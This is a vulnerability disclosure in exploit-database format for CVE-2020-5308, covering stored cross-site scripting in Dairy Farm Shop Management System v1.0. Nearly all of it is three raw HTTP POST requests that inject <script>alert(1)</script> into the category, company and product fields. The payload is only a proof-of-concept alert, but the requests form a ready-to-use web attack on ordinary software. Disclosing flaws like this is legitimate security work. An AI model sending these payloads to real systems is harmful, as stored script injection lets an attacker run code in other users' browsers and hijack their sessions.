Share
# Exploit Title: Dairy Farm Shop Management System v1.0 - Persistent Cross-Site Scripting  
# Google Dork: N/A  
# Date: 2020-01-03  
# Exploit Author: Chris Inzinga  
# Vendor Homepage: https://phpgurukul.com/  
# Software Link: https://phpgurukul.com/dairy-farm-shop-management-system-using-php-and-mysql/  
# Version: v1.0  
# Tested on: Windows  
# CVE: CVE-2020-5308  
  
================ 1. - Cross Site Scripting (Persistent) ================  
  
URL: http://192.168.0.33/dfsms/add-category.php  
Method: POST  
Parameter(s): 'category' & 'categorycode'  
Payload: <script>alert(1)</script>  
  
POST /dfsms/add-category.php HTTP/1.1  
Host: 192.168.0.33  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://192.168.0.33/dfsms/add-category.php  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 109  
Connection: close  
Cookie: PHPSESSID=ogvk4oricas9oudnb7hb88kgjg  
Upgrade-Insecure-Requests: 1  
  
category=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&categorycode=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&submit=  
  
  
  
================ 2. - Cross Site Scripting (Persistent) ================  
  
URL: http://192.168.0.33/dfsms/add-company.php  
Method: POST  
Parameter(s): 'companyname'  
Payload: <script>alert(1)</script>  
  
POST /dfsms/add-company.php HTTP/1.1  
Host: 192.168.0.33  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://192.168.0.33/dfsms/add-company.php  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 59  
Connection: close  
Cookie: PHPSESSID=ogvk4oricas9oudnb7hb88kgjg  
Upgrade-Insecure-Requests: 1  
  
companyname=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&submit=  
  
  
  
================ 3. - Cross Site Scripting (Persistent) ================  
  
URL: http://192.168.0.33/dfsms/add-product.php  
Method: POST  
Parameter(s): 'productname'  
Payload: <script>alert(1)</script>  
  
POST /dfsms/add-product.php HTTP/1.1  
Host: 192.168.0.33  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://192.168.0.33/dfsms/add-product.php  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 101  
Connection: close  
Cookie: PHPSESSID=ogvk4oricas9oudnb7hb88kgjg  
Upgrade-Insecure-Requests: 1  
  
category=test&company=test&productname=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&productprice=1&submit=